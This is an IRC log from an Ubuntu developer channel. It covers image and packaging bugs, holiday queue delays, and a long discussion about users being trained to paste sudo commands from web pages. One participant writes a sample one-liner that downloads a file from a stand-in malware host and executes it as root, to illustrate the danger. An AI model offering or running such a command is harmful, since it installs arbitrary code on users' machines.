[00:19] i think the ubuntu 7.10 server image was created incorrectly [00:39] khermans: what makes you say that? [00:39] dmb, the vmx file is configured for 64-bit but this is a 32-bit vmware [00:40] oh, the vmware appliance? [00:40] dmb, the isv image, yes [00:40] http://isv-image.ubuntu.com/vmware/Ubuntu-7.10-server-i386.zip [00:41] dmb, so errors come up when you run it [00:41] dmb, its a simple fix, but i thinks its a bad release [00:41] ill try and see if i can confirm [00:51] dmb, let me know if you find the same [00:52] dmb, i have to go now -- but i signed up on ubuntu-release -- maybe we can discuss on there [00:53] or feel free to email me any questions; kristian.hermansen ..at.. gmail.com [01:21] Hello. I'm learning Python and I'd like to have a look at real-world Python applications. I know Canonical/Ubuntu's developers are fond of Python, so I'd like to know what Python-powered application in the Ubuntu project you recommend me to have a look at? Thanks in advance. [01:22] BTW, I'm willing to contribute code === bigon is now known as bigon` === kitterma is now known as ScottK2 === Huahua is now known as iPfeil === macd_ is now known as macd === elkbuntu_ is now known as elkbuntu === elkbuntu_ is now known as elkbuntu === asac_ is now known as asac === jpatrick_ is now known as jpatrick === bigon` is now known as bigon [16:23] * emgent heya [16:29] <|DuReX|> is there some descent fix for dmraid compatibility with udev ? [16:34] |DuReX|, it's the holidays, so likely few developers are really here [16:34] <|DuReX|> to bad :( [16:36] <|DuReX|> i edited a udev rule [16:37] <|DuReX|> now i don't have those gay 'attempt to access beyond drive limit' anymore :p [16:37] <|DuReX|> but i need to find out how to make it creates a /dev/disk/by-uuid for the dmraid devices === ryu2 is now known as ryu [18:06] Bug #179407 Is there any reason why kubuntu-desktop shouldn't recommend ubufox? [18:06] Launchpad bug 179407 in kubuntu-meta "kubuntu-desktop should recommend ubufox" [Undecided,Confirmed] https://launchpad.net/bugs/179407 [18:08] warp10: does it recommend firefox? [18:09] Does not look so. [18:09] yeah we don't have firefox installed by default [18:09] so why would we have ubufox [18:10] Makes no sense without firefox, yes. [18:10] blueyed, CheGuevara: but both xubuntu-desktop and edubuntu recommends firefox and ubufox. Does kubuntu-desktop installs another browser by default? [18:11] yes [18:11] yes, konqueror. [18:11] konqueror [18:11] CheGuevara, blueyed: Ok, thanks, I'll report it in the bug report [18:12] don't worry about it i'll close it [18:12] CheGuevara: ok, ty [18:12] np [18:22] How do I access the emacs menus? [18:23] theunixgeek: support in #ubuntu === smurf is now known as Matthias_Urlichs [18:32] warp10: because kubuntu dosent use firefox, we use konqueror are the default browser [18:34] imbrandon: yeah, now I know that. I've just never used KDE and doesn't know it (almost) completely :) === xerakko_ is now known as xerakko === ryu2 is now known as ryu [19:25] could someone approve nss in hardy's NEW-bin queue ? it's blocking firefox 3 since Dec 22 :( [19:26] Ubulette: not the best timing [19:27] i know but users dont care about timing, they keep asking me why it takes so long [19:28] paid developers have lives aside, too. [19:28] true, but not archive admins will be here [19:28] i myself got 3 packages in the queue [19:28] a few more days until post 2008-01-01 won't kill anyone dying for ff3 [19:29] anyone want to review a patch i submitted? [19:29] patch to what and where? [19:29] pan [19:29] Bug #179417 [19:29] Launchpad bug 179417 in pan "Viewing large images broken" [Undecided,Confirmed] https://launchpad.net/bugs/179417 [19:29] heya crimsun [19:30] Ubulette: you have to wait untill an archive day after the scheduled holiday break, btw did you fix the probelmwith ff3 icon not showing in KDE ? [19:31] imbrandon, yes [19:31] cool, just checkin :) [19:31] UberCanuck: would be quicker if you post a debdiff and not just a patch [19:31] CheGuevara: kewl - will do [19:32] UberCanuck: is it a universe package? [19:33] crimsun, ok, i'll tell those begging users that they should have a life too, ubuntu being closed until further notice [19:34] Ubulette: its not further notice, its a scheduled break , see the release schedule [19:34] CheGuevara: main [19:35] imbrandon, it was a sarcasm [19:35] Ubulette: i know, i just dident appreciate the sarcasm , so i added a bit of my own :) [19:36] * imbrandon hugs Ubulette [19:37] anyhow , to give them a realistic ETA if thats what you are after is jan 3 , that give everyone time to get back and check the queues and it to build etc [19:37] might be sooner or a bit later but that is a "good estimate" [19:38] imbrandon, i don't like it when I work to produce timely updates and being blocked for weeks when a simple click is needed. so next time, i won't care about being in sync with upstream. that's it. I've learned my lesson. [19:39] a simple "click" isnt all thats needed for NEW packages, actualy its the longest process we have [19:39] it takes alot of review to get through the NEW queue [19:39] in that case, it's just a soname bump [19:39] licenses, suid bins , general package errors etc etc etc [19:40] ..coming from debian [19:40] UberCanuck: it seems http://bugzilla.gnome.org/attachment.cgi?id=100069&action=view is more appropriate. Why does Pan need an additional patch? [19:40] Ubulette: i understand your frustration , but again relize this only happens once a year, just unfortunate timing [19:42] crimsun: because the version I'm using is still broken - so the upstream hasn't hit my laptop yet [19:45] crimsun: is the bug still valid? [19:45] lool: / slomo: Are either of you around to pull in the patch posted at gnome #477860? (http://bugzilla.gnome.org/attachment.cgi?id=100069&action=view) [19:45] Gnome bug 477860 in general "Pan has trouble displaying large jpegs using gtk+ 2.12" [Critical,Resolved: fixed] http://bugzilla.gnome.org/show_bug.cgi?id=477860 [19:46] lool: / slomo: sorry, that's gnome 494667. [19:46] Gnome bug 494667 in gdk-pixbuf "gdkpixloader jpeg loader problems with some files" [Critical,Resolved: fixed] http://bugzilla.gnome.org/show_bug.cgi?id=494667 [19:47] UberCanuck: it's not a Pan bug [19:50] crimsun: true, but its derived in pan when the change happened within pixbuf [19:50] UberCanuck: I'd rather wait for a DD to upload to Debian so that it can be synced into Ubuntu. [19:50] crimsun: okay - thanks [20:30] Hi [20:30] hi [20:31] I've got a question. Who to contact if I got some security-related design ideas ? [20:31] is it something you want to keep private? [20:31] No, not at all. [20:32] Is there a specific person managing security features ? Or just this channel ? [20:32] there's security@ubuntu.com [20:32] but tahts to report vulnurabilities [20:33] ubuntu-devel@lists.ubuntu.com might be more appropriate [20:36] On this list there was a discussion a few weeks ago about what to do when some pages just tell the user to sudo ...with no result. [20:37] I think there is still lots of stuff to do to make a one-user-who-is-admin ubuntu more secure [20:44] CheGuevara, https://lists.ubuntu.com/mailman/listinfo/ubuntu-devel-discuss [20:45] Thanks. I am a member of this list already. I will try to sort my thoughts and write a mail as small as possible :-) [20:47] ThorstenSick, that was discussed on LugRadio too :-) [20:47] The problem with pages telling people to sudo , I mean [20:48] And AFAIK some pages already tried it. I do not know how successful. [20:48] I think the answer lies in considering why Windows and Mac OS X don't have the same problem [20:49] (They have other security problems, but not this one) [20:50] The normal windows user has admin rights. But they do not enter some obscure stuff at the command line normally. [20:50] Exactly [20:50] For linux newbies, doing obscure stuff is normal [20:51] In the Windows and Mac OS X user base, there is a culture that if some Web page is asking you to enter commands in the terminal *at all*, it's highly suspicious [20:51] And people won't find the terminal [20:51] That's part of it, yes [20:52] But windows user click on every icon they see. (And the executable rights are tied to the file extension) [20:52] Right, that's why I said "They have other security problems, but not this one" [20:53] :-) [20:53] So "all" we need to do is get to the point where a non-programmer never needs to use the terminal to use Ubuntu. [20:53] Then they'll start treating instructions to enter stuff into the terminal as suspicious, and rightly so. [20:54] And add some better warning "You are entering a dangerous area. Beware of wild animals" [20:55] It can be dedicated to those people who know what they're doing, or who are using a trusted source of information (e.g. a book on how to learn programming). [20:56] Yes. Is there a plan to implement a collection of small scripts to solve all the little problems the users have ? These could be signed. [20:57] There's no *single* plan for that [20:58] Individual things that require non-programmers to use the terminal (or to edit text configuration files) tend to be replaced by individual graphical utilities, which have individual specifications [20:58] (even when they would make more sense as additions to existing utilities, unfortunately) [20:58] It will take lots of time to implement all the small fixes the users want. [20:58] yep [20:59] TANSTAAFL. [21:00] An easy to where every one could write a plug in without much experience would be more effective, I think. There will always be a small feature missing. [21:01] An easy what? [21:01] Sorry [21:01] An easy API. === DreamThief is now known as DelayLama [21:01] A tool just offering a menu to all the plug-ins. Each one solving a small problem. [21:02] An easy API is important for all sorts of programming, not just for small utilities :-) [21:02] Can you give an example or two? [21:02] Jepp. But here I want the people normally writing the howtos and wikis to be able to write a plug in. [21:02] should just be something like: [21:03] copy(file1, file1.backup) [21:03] add_line(file1,"new host") [21:03] The user should be able to see what it does, before executing the plug in. [21:04] (The plug in copies the file x to y and adds the line FOO to it) [21:04] The plugin must be reviewed, signed and released [21:04] What is file1 in this example? [21:05] In a working example it is a specific config file. [21:05] Which config file? [21:07] Let me just write a specific example. Still pseudo code: [21:07] http://ubuntuguide.org/wiki/Ubuntu:Gutsy#Manual_Method [21:08] copy("/etc/apt/sources.list", "/etc/apt/sources.list_backup") [21:08] I think that's a good example of why this would be a bad idea :-) [21:08] .... [21:09] Why ? [21:09] update-manager does special things to ensure that the upgrade from 7.04 to 7.10 works [21:09] I don't know the details, but I do know that it's more than just changing the sources.list and doing apt-get update [21:10] Ok [21:10] Following that manual process specified on ubuntuguide.org will work sometimes, but it's not guaranteed to work. [21:10] I seem not to be good at choosing examples :-) [21:10] My intentions are: [21:11] So you're much better off using the graphical method [21:11] a) Have a restricted API. So the script writer can not execute every command from command line (like with a system call) [21:11] and Ubuntu is better off encouraging you to use the graphical method, rather than implementing a process for signing the script to use the manual method. [21:11] b) Be able to output what the plug in will do before it does anything [21:11] And you can add repositories from Software Sources. [21:12] ThorstenSick, who are you proposing would sign the scripts, anyway? [21:12] c) Have plugins which can easily be reviewed [21:12] Reviewed by who? [21:13] I fear the only one who can sign it are ubuntu "officials" these scripts must be in the normal repositories [21:14] The central idea is to move the scripts away from the untrusted web to the trusted repository [21:15] <|DuReX|> it sux that Ubuntu fucks up UUID's with dmraid :( [21:15] ThorstenSick, many of the current "Enter this stuff in the terminal" instructions are to achieve things that weren't foreseen when the OS was released. [21:15] For example, installing versions of software that aren't packaged for that release. [21:16] Or doing particular things with X to work around bugs that weren't known at the time. [21:16] !language | |DuReX| [21:16] |DuReX|: Please watch your language and topic to help keep this channel family friendly. [21:16] If you're saying these scripts should be in the official repositories, then why not just fix the particular problems properly in the official repositories instead? [21:17] Then there would be no way to get these instructions of the web [21:17] For example, package the new versions of the software, or fix the bugs in X, or whatever. [21:17] <|DuReX|> i'm trying to get it working for 3 days now, seems like nobody can help me ? [21:17] |DuReX|: #ubuntu is the help chanel [21:17] <|DuReX|> nobody there seems able to help me ... :s [21:17] |DuReX|, have you tried #ubuntu, , and ? [21:18] The fix would be the best solution. Together with GUI tools. [21:18] <|DuReX|> yes mpt :( [21:19] ThorstenSick, so how are you proposing that a user get from seeing the script on the Web, to installing the script from an official repository? [21:20] The web page must offer the id of the script to solve the problem (If you also got the same problems with X, Plug in number 123 solves it) [21:21] Mayb add some special link to the page [21:21] These scripts must be updated _between_ releases. [21:22] sounds like a fix for things like that just need to hit SRU or backports, instead of scripts [21:22] |DuReX|, if it's important enough that you're willing to pay to get it fixed, try [21:22] educating people about those would be far more helpfull than a whole new sytem [21:24] there's also something that leaves a sour aftertaste regarding randomly installing plugins to resolve problems. (Not that I have much room to speak.) [21:24] ThorstenSick, an URL protocol so you could click on a link in a Web page, and have the package manager launch with the relevant package selected, would be very nifty -- but it would be nifty for every package, not just for scripts :-) [21:24] I fear it is almost impossible to do security education [21:25] And if you're suggesting that problems be solved between releases, some already are, but most (nearly all) are solved by updated packages rather than by new workaround scripts [21:26] most -> most of those [21:26] It is not a perfect solution. The best soultion would be to have everything running out of the box. If this is not possible, we should offer an easy way to fix the problems without messing with the system [21:27] If writing a script was an efficient way of fixing problems between releases, I expect the developers would be doing that much more often, instead of just releasing fixed packages as they do. [21:27] A fixed package must be tested. [21:27] So must a script! [21:29] So must a script. But a script is small. With only a few dependencies [21:29] they're also capable of doing interesting things, e.g., the first few revisions of automatix. [21:30] most of the tips are just "sudo apt-get install foo" tips. With a few settings afterwards or before (adding new repos) [21:31] These could be moved to "start synaptic..." [21:31] I think adding arbitrary new repositories is reintroducing the security problem you're trying to solve [21:31] Yes, it is. But there we could enforce signing :-) [21:31] signing by who? :-) [21:32] "sudo apt-get install foo" instructions could be replaced by the URL handler I mentioned [21:32] that passes off to the package manager [21:32] Sorry. i do not want to add new repos. i was just reading the ubuntuguide wiki [21:32] Doing som small statistics === Matthias_Urlichs is now known as smurf [21:32] s/som/some/ [21:33] Cleaning this wiki and others of every line starting with sudo by either adding the URL handler or bugfixes would help [21:34] Everything left would be a candidate for these plugin script system [21:34] This reminds me of and (read them in that order) [21:38] :-) [21:38] I love Debian and Ubuntu [21:39] also apturl should take care of most of this [21:40] another release or two and all releases should have it [21:40] hehe [21:40] This would remove many of the sudo tips [21:41] btw does kubuntu support apturl ? [21:43] ooooo noooo [21:43] ? [21:44] apturl uses "Yes" and "No" buttons [21:44] ahh i wasent sure if it called synaptic [21:44] or did it its self [21:44] was more what i was asking :) [21:44] i hadent actualy looked at it [21:45] but still, that's 90% of the way there [21:45] oh definately [21:45] Now nag all the tutorial sites to start using it :-) [21:45] heh nag christer and everyone else will follow in line :) [21:46] * imbrandon jokes [21:46] mpt: dident you author apturl ? [21:47] ThorstenSick: you really can not be serious about fixing things with scripts. Have you seen the problems caused by automatix? [21:47] imbrandon, I think you've confused me with a programmer [21:47] also "a script" [21:48] mpt: hehe [21:49] imbrandon: I think mvo is who you're looking for :) [21:49] probably, not really "looking for" though :) [21:49] I do not want to fix all the problems with script. They should be a work around till the problem is solved. Thes should substitute the scripts printed on web pages telling the user to sudo this and sudo that. [21:50] ThorstenSick: what about just fixing it in the dev release and backporting the fix, then even those that dont read the tutorial benifet [21:50] At the moment users a trained to copy everything they read online into a terminal [21:50] Would be the best solution. [21:51] my point is there are already things in place to "fix" your problem, they are just under utilized imho [21:51] But as long as there are pages telling the users to solve their problems using sudo in terminals, this is a vulnerability of ubuntu [21:51] ThorstenSick, the reason you want to substitute the instructions on Web pages is to make them more secure, and the only way to make them more secure is to apply all the same procedures as happen for real fixes, and if you're going to apply all the same procedures, you might just as easily do that in fixing the problem properly. [21:52] exatly what i was trying to say, but mpt said it better [21:52] exactly* [21:52] There is no "Free Lunch" setting on this slider. [21:52] sudo wget ht tp://malware-online.com/stuff; chmod +x stuff; ./stuff [21:53] ThorstenSick: those will *ALWAYS* exist, even if we make this script repo, there wills till be someone that says "its just easyer for me to blog about how to fix it manualy , than subit a script for review" then your back to square one with a new security layer to maintain [21:53] I want to offer all thos volunteers an alternative to write a web page with tips. I want to create a system where tips and tricks can be signed. [21:55] ThorstenSick: then make a "proof-of-concept" no one says the ubuntu repos have to be the only "trusted" ones many community repos have become "trusted" like seveas's etc [21:55] but again i agree with mpt 100% , if your gonna do that might as well fix the real problem [21:56] imbrandon: but what if it isn't actually "a problem" [21:57] backports and SRUs dont have to be slow, if people were educated more to request new ones correctly it would help greatly with your problem [21:57] Was seveas the one who put an updated screensaver package in his repository, which changed the default background picture to a big warning not to use third-party repositories willy-nilly? [21:57] mpt: yea iirc [21:57] imbrandon: say, just a very simple example (and a bad one since we have a GUI for that already), enabling universe/multiverse by editing /etc/apt/sources.list ? [21:57] imbrandon: or enabling a feature by editting a config file in general? [21:58] http://www.flickr.com/photo_zoom.gne?id=296804891&size=o [21:58] Chipzz: still better to fix the underlying problem ( and those are on by default now since feisty iirc ) [21:58] which in this case it was fixed [21:59] mpt: hahah yea thats the one [21:59] Good idea [22:00] imbrandon: lets say I have a tutorial on my webpage explaining how to use LDAP for logins. How do you suggest "fixing" that? You can not enable LDAP by default, since you don't know the server, and most people do not want LDAP enabled logins [22:00] imbrandon: what do you suggest "the underlying problem" is there, and which package would you fix? [22:00] Chipzz: he isnt sugesting replacing tutorals , he is saysing for working arround "problems" [22:00] (yes I'm aware that there is a package being developed to make it easier to configure) [22:00] tutorals will always exist [22:01] Chipzz, pester ajmitch to finish his LDAP configuration utility so that Ubuntu ships with a graphical utility to do that. Then, write the tutorials about how to use the built-in utility. [22:01] Sorry, there was a mis-understanding. The problems I was talking about are not bugs [22:01] even when there are simple gui's, i'm sure you could find a tutoral about changing the desktop walpaper for your fav OS too [22:01] mpt: 23:01 < Chipzz> (yes I'm aware that there is a package being developed to make it easier to configure) [22:01] mpt: ;) [22:01] They are these small tutorials, tips, fixes [22:02] mpt: I just failed to come up with a better example; feel free to give a better example if you come up with one ;) [22:02] brb [22:02] because I'm sure there are [22:04] Chipzz, I think that solution generalizes to all examples, except in the areas of learning to program or sysadmin (for which I'd recommend learning from a trustworthy book rather than a random Web site). [22:05] mpt: slightly different category, but... how about legally encumbered features? [22:05] for example, encoding .3gp files with ffmpeg IIRC. people will have to compile their own versions because we can't ship it [22:07] mpt: and while you're right that the "meta-fix" to such problems is creating configuration utilities, the problem with that fix is you need manpower [22:07] Chipzz, I'd propose that trusted tutorials use apt: to link to proprietary software in the partners repository to do those functions. [22:07] crimsun: Committed patch for GNOME #494667 in SVN; will be part of next upload [22:07] Gnome bug 494667 in gdk-pixbuf "gdkpixloader jpeg loader problems with some files" [Critical,Resolved: fixed] http://bugzilla.gnome.org/show_bug.cgi?id=494667 [22:07] crimsun: Thanks! [22:07] lool: thank /you/ ! [22:08] mpt: that may be a problem an sich too; take for example the example of linking to w32codecs packages on the ubuntu wiki [22:08] Chipzz, it's getting outside Ubuntu's ambit to make copyright/patent infringement a secure thing to do :-) [22:09] anyway [22:09] * Chipzz afk again :) [22:09] And time for me to go home [22:10] Thanks and CU [22:10] I think the best option is to write a proof of concept. [22:11] ThorstenSick, I suggest you pick one problem you want to solve, figure out a good graphical way of solving it, and do what you can to develop that solution and get it into Ubuntu Main [22:11] Then go on to another [22:11] I think that will be more effective in the long run than implementing a Workaround Installation System. [22:13] Thanks. I will check for alternatives to solve the problem. [22:27] Good night === nicolai_ is now known as Kopfgeldjaeger === ryu2 is now known as ryu === asac_ is now known as asac [23:40] imbrandon: tonio was working on apturl as part of kio-apt, see his blog